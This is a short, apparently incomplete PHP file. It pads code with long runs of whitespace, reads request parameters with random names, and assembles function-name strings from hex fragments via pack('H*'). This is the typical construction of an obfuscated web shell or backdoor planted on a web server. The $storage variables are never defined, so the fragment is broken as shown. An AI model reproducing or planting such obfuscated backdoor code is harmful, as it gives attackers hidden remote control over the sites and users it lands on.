<?php																																										
																																										trim($_REQUEST['XxGOOI']);
																																										trim($_REQUEST['uIlhMC']);
 
$parle_tokens6 = pack("H*", $storage1.'74'.'72'.$storage4.'61'.$storage2.$storage6.'67'.$storage4.'74'.$storage6.$storage8.$storage12.$storage13.$storage10.$storage4.$storage13.'74'.'73');
$parle_tokens7 = pack("H*", '70'.$storage8.$storage5.$storage12.'73'.'65');
$config = pack("H*", $storage8.'6f'.$storage13.$storage14.$storage15.$storage16);





